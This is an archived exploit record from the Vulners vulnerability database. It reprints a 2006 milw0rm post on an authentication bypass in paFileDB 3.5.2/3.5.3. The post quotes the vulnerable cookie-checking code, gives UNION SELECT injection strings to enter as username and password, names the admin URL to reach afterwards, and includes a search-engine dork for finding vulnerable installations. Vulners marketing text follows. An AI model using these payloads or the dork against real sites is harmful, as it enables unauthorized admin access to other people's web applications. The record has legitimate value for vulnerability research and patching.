Vulners
Lucene search
paFileDB 3.5.2/3.5.3 - Remote Authentication Bypass / SQL Injection
# PafileDB Login SQL injection =)
# author : koray & [email protected]
# Risk : High
# Class : Remote
# Vulnerable Script : pafileDB
# Version : 3.5.2 / 3.5.3
# google : powered by pafiledb 3.5.3/2
# greetz : www.cigicigi.net & redhackers
Vulnerable;
include/admin/auth.php
c0de ;
if (isset($_COOKIE['pafiledb_user']) && isset($_COOKIE['pafiledb_pass'])) { //If the cookie exists, do all this:
$admininfo = array();
if (checkpass($_COOKIE['pafiledb_user'], $_COOKIE['pafiledb_pass'], $admininfo)) {
//checkpass() returned true, so the user exists
//$adminloggedin is a var used throughout the script to see if someone's logged in.
$adminloggedin = true;
$smarty->assign('admininfo', $admininfo[0]);
} else { //The cookie exists, but the user/pass don't match
...
username : 1%20union%20select%%20201,2,3,4/*
password : 1%20union%20select%%20201,2,3,4/* /
pafile/pafiledb.php?action=admin logged...
# milw0rm.com [2006-12-08]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Dec 2006 00:00Current
7High risk
Vulners AI Score7